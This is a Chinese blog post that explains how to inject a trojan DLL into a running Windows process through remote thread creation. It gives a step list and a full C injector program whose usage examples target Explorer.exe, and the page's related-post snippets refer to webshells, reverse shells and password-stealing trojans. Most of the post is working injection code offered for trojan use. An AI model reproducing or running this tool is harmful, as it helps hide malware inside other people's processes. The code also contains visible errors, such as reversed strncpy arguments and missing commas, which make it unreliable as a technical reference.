DLL木马注入的一般步骤

最新推荐文章于 2024-09-16 21:11:51 发布
最新推荐文章于 2024-09-16 21:11:51 发布
阅读量1.1k 收藏 4
点赞数
分类专栏: VC 文章标签: dll null windows path api thread

(1)取得宿主进程(即要注入木马的进程)的进程ID dwRemoteProcessId;

(2)取得DLL的完全路径,并将其转换为宽字符模式pszLibFileName;

(3)利用Windows API OpenProcess打开宿主进程,应该开启下列选项:

a.PROCESS_CREATE_THREAD:允许在宿主进程中创建线程;

b.PROCESS_VM_OPERATION:允许对宿主进程中进行VM操作;

c.PROCESS_VM_WRITE:允许对宿主进程进行VM写。

(4)利用Windows API VirtualAllocEx函数在远程线程的VM中分配DLL完整路径宽字符所需的存储空间,并利用Windows API WriteProcessMemory函数将完整路径写入该存储空间;

(5)利用Windows API GetProcAddress取得Kernel32模块中LoadLibraryW函数的地址,这个函数将作为随后将启动的远程线程的入口函数;

(6)利用Windows API CreateRemoteThread启动远程线程,将LoadLibraryW的地址作为远程线程的入口函数地址,将宿主进程里被分配空间中存储的完整DLL路径作为线程入口函数的参数以另其启动指定的DLL;

(7)清理现场。

 

#include < windows.h >
#include < stdlib.h >
#include < stdio.h >
#include < psapi.h >

DWORD ProcessToPID(  char   * );             // 将进程名转换为PID的函数
void   CheckError  (  int int char   * );         // 出错处理函数
void   usage       (  char   * );             // 使用说明函数

PDWORD pdwThreadId; 
HANDLE hRemoteThread, hRemoteProcess;
DWORD  fdwCreate, dwStackSize, dwRemoteProcessId;
PWSTR  pszLibFileRemote = NULL;

 void  main( int  argc, char   ** argv)
 {
    int iReturnCode;
    char lpDllFullPathName[MAX_PATH];
    WCHAR pszLibFileName[MAX_PATH]={0};
    //处理命令行参数
    if (argc!=3) usage("Parametes number incorrect!");
    else{
        //如果输入的是进程名,则转化为PID
        if(isdigit(*argv[1])) dwRemoteProcessId = atoi(argv[1]);
        else dwRemoteProcessId = ProcessToPID(argv[1]);
        //判断输入的DLL文件名是否是绝对路径
        if(strstr(argv[2],":/")!=NULL)
            strncpy(argv[2], lpDllFullPathName, MAX_PATH);
        else
        {    //取得当前目录,将相对路径转换成绝对路径
            iReturnCode = GetCurrentDirectory(MAX_PATH, lpDllFullPathName);
            CheckError(iReturnCode, 0"GetCurrentDirectory");
            strcat(lpDllFullPathName, "/");
            strcat(lpDllFullPathName, argv[2]);
            printf("Convert DLL filename to FullPathName: %s ",
                lpDllFullPathName);
        }
        //判断DLL文件是否存在
        iReturnCode=(int)_lopen(lpDllFullPathName, OF_READ);
        CheckError(iReturnCode, HFILE_ERROR, "DLL File not Exist");
        //将DLL文件全路径的ANSI码转换成UNICODE码
        iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
            lpDllFullPathName, strlen(lpDllFullPathName),
            pszLibFileName, MAX_PATH);
        CheckError(iReturnCode, 0"MultByteToWideChar");
        //输出最后的操作参数
        wprintf(L"Will inject %s", pszLibFileName);
        printf(" into process:%s PID=%d ", argv[1], dwRemoteProcessId);        
    }


    //打开远程进程
    hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许创建线程 
        PROCESS_VM_OPERATION | //允许VM操作
        PROCESS_VM_WRITE,       //允许VM写
        FALSE, dwRemoteProcessId );    
    CheckError( (int) hRemoteProcess, NULL, 
        "Remote Process not Exist or Access Denied!");
    //计算DLL路径名需要的内存空间
    int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
    pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, 
        MEM_COMMIT, PAGE_READWRITE);
    CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx");
    //将DLL的路径名复制到远程进程的内存空间
    iReturnCode = WriteProcessMemory(hRemoteProcess, 
        pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);
    CheckError(iReturnCode, false"WriteProcessMemory");
    //计算LoadLibraryW的入口地址
    PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
        GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
    CheckError((int)pfnStartAddr, NULL, "GetProcAddress");
    //启动远程线程,通过远程线程调用用户的DLL文件    
    hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0,                                                         pfnStartAddr, pszLibFileRemote, 0, NULL);
    CheckError((int)hRemoteThread, NULL, "Create Remote Thread");
    //等待远程线程退出
    WaitForSingleObject(hRemoteThread, INFINITE);
    //清场处理
    if (pszLibFileRemote != NULL)
        VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
    if (hRemoteThread != NULL) CloseHandle(hRemoteThread );
    if (hRemoteProcess!= NULL) CloseHandle(hRemoteProcess);
} // end of main()

 // 将进程名转换为PID的函数
DWORD ProcessToPID( char   * InputProcessName)
 {
    DWORD aProcesses[1024], cbNeeded, cProcesses;
    unsigned int i;
    HANDLE hProcess;
    HMODULE hMod;
    char szProcessName[MAX_PATH] = "UnknownProcess";



    // 计算目前有多少进程, aProcesses[]用来存放有效的进程PIDs
    if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )  return 0;
    cProcesses = cbNeeded / sizeof(DWORD);
    // 按有效的PID遍历所有的进程
    for ( i = 0; i < cProcesses; i++ ) 
    {
        // 打开特定PID的进程
        hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |PROCESS_VM_READ,
            FALSE, aProcesses[i]);
        // 取得特定PID的进程名
        if ( hProcess )
        {
            if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
            {
                GetModuleBaseName( hProcess, hMod, 
                    szProcessName, sizeof(szProcessName) );
                //将取得的进程名与输入的进程名比较,如相同则返回进程PID
                if(!_stricmp(szProcessName, InputProcessName)){
                    CloseHandle( hProcess );
                    return aProcesses[i];
                }
            }
        }//end of if ( hProcess )
    }//end of for
    //没有找到相应的进程名,返回0
    CloseHandle( hProcess );
    return 0;
} // end of ProcessToPID

 // 错误处理函数CheckError()
 // 如果iReturnCode等于iErrorCode,则输出pErrorMsg并退出
void  CheckError( int  iReturnCode,  int  iErrorCode,  char   * pErrorMsg)
 {
    if(iReturnCode==iErrorCode) {
        printf("%s Error:%d ", pErrorMsg, GetLastError());
        //清场处理
        if (pszLibFileRemote != NULL)
            VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
        if (hRemoteThread != NULL) CloseHandle(hRemoteThread );
        if (hRemoteProcess!= NULL) CloseHandle(hRemoteProcess);
        exit(0);
    }
} // end of CheckError()

 // 使用方法说明函数usage()
void  usage( char   *  pErrorMsg)
 {
    printf("%s ",pErrorMsg);
    printf(" Remote Process DLL by Shotgun ");
    printf(" This program can inject a DLL into remote process ");
    printf("Email: ");
    printf(" Shotgun@Xici.Net ");
    printf("HomePage: ");
    printf(" http://It.Xici.Net ");
    printf(" http://www.Patching.Net ");
    printf("USAGE: ");
    printf(" RmtDLL.exe PID[|ProcessName] DLLFullPathName ");
    printf("Example: ");
    printf(" RmtDLL.exe 1024 C:/WINNT/System32/MyDLL.dll ");
    printf(" RmtDLL.exe Explorer.exe C:/MyDLL.dll ");
    exit(0);
} // end of usage() 




muyang008
关注
专栏目录
DLL注入器.rar
04-04
DLL注入的主要步骤包括: 1. **创建DLL**:首先,你需要编写一个动态链接库(DLL),其中包含你想要在目标进程中执行的函数或代码。这个DLL可以实现各种功能,如数据收集、功能增强或错误修复。 2. **找到目标进程...
记一次服务器被木马注入攻击
weixin_44235608的博客
01-26 3596
服务器 木马 注入 攻击 排查
discuz论坛注入木马
小刚的博客
06-20 4667
今天试了一下很牛逼的一套流程 对discuz论坛挂马,利用菜刀上传webshell,并反向shell获取控制权,最后更改文件权限。 虽然是我看众多视频学来的,但很多知识还是挺有用的,今天就结合一下,搞一波我的虚拟机。 实验环境: VM搭建的虚拟测试环境 1.centos7安装的discuzs3.3论坛http://10.10.10.64/upload/forum.php 2.kali 10.10....
一句话木马SQL注入
人若有志,就不会在半坡停止。
08-25 2856
sql注入
在Visual C++中实现一个DLL木马
zhihu008的专栏
07-25 6652
在Visual C++中实现一个DLL木马   写一个木马挂载程序,听起来似乎很玄,其实也很简单,本文将告诉你怎样用Visual C++实现一个侵入木马的程序。本文主要涉及动态链接库(DLL木马,目前相当多数的木马病毒都以这种方式被加载。 DLL木马攻击指的是编程者在DLL中包含木马程序代码,随后在目标主机中选择特定目标进程,以某种方式强行指定该进程调用包含这个木马程序的D
木马植入的方法
Sunny
01-26 1万+
Windows 系统下,木马可以通过注册表、Win.ini、system.ini、Autoexec.bat 和Config.sys、捆绑替换系统文件、启动菜单及程序配置. i n i 文件来自我启动运行。① Win.in:[WINDOWS]下面,“run=”和“load=”行是Windows 启动时要自动加载运行的程序项目;② System.ini:[BOOT]下面有个“shell=Explor
注入dll 远程注入方法
10-30
DLL注入技术虽然有其合法用途,但也很容易被滥用,比如用于制作病毒、木马等恶意软件。因此,在使用时必须遵循合法和道德的规定,防止对他人系统造成侵害。同时,了解和掌握这种技术也有助于提高安全意识,更好地...
远程dll注入器及源码
11-30
然而,需要注意的是,DLL注入技术可以被滥用,用于恶意活动,如病毒和木马,因此在实际使用时应遵守法律和道德规范。 在学习和使用这个工具时,建议先了解Windows API的基本概念,熟悉如何操作进程和内存,同时,对...
DLL注入示例课件源码
09-13
DLL注入通常通过以下步骤进行: 1. 创建DLL:首先,我们需要编写一个动态链接库(DLL),这个库包含我们想要在目标进程中运行的代码。DLL可以提供额外的功能或修改目标程序的行为。 2. 获取进程句柄:使用Windows ...
驱动级DLL注入
07-13
然而,值得注意的是,驱动级DLL注入技术也可能被滥用,用于恶意活动,如病毒、木马等。因此,任何涉及系统级别的操作都应遵循合法和道德的原则,并确保遵循适用的法律。 总的来说,"驱动级DLL注入器"是一个强大但...
盗密码的木马原理之注入VC版
07-01
利用对目标程序注入动态链接库来获取密码框内容。可获取大部份无特殊驱动保护的密码框~此为ring3级API写成,若要破解驱动保护的密码框可回帖说明。手头上有ring0写的内核程序可从底层破解所有密码框 。
自己写的木马木马DLL注入程序(转)
要饭's Blog
06-24 2695
/******************************************************名称:木马DLL注入程序功能:调用系统钩子将木马DLL注入宿主线程作者:薛峰日期:2004-6-22说明:进程的隐藏,本程序使用大量API,请参考MSDN******************************************************/#include "std
DLL的远程注入技术
chenyujing1234的专栏
08-14 1万+
转载自: http://blog.csdn.net/bai_bzl/article/details/1801023   一、DLL注入 DLL的远程注入技术是目前Win32病毒广泛使用的一种技术。使用这种技术的病毒体通常位于一个DLL中,在系统启动的时候,一个EXE程序会将这个DLL加载至某些系统进程(如Explorer.exe)中运行。 这样一来,普通的进程管理器就很难发现这种病毒了,而
木马病毒隐身穿墙术解密之文件注入和反弹连接
HIT_ZOE的博客
09-18 1451
作者: 刘源 比特网  2010-04-01 12:05:08                                                                                               木马病毒隐身穿墙术解密之文件注入和反弹连接   对于木马病毒当前所使用的隐身和穿墙术,到这篇已经是第三篇了,虽然每篇的篇
我发现的注入到网页中的vbscript_木马病毒源代码
热门推荐
weixin_30385925的博客
05-10 2万+
<SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000...
【刷题】数据结构——Java常见数据结构
最新发布
qq_42581685的博客
09-16 174
【代码】【刷题】数据结构——Java常见数据结构。
Java对象列表属性映射工具类
NoviceZ的博客
09-13 263
经常有这种情况,就是获取到一个对象列表之后,需要根据对象里某个字段的值去获取另一个字段的值。如下所示,有个Item对象列表,Item对象里有个id字段和Value字段,现需要根据id的值去查询value的值。
C++实现DLL注入进程详解
然而,完整的注入代码还包括定位DLL在目标进程中的地址、设置远程线程参数以及创建线程等步骤,这些在提供的代码片段中并未完全展示。 C++实现DLL注入是一项涉及多个系统API和进程间交互的复杂任务,需要对Windows...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值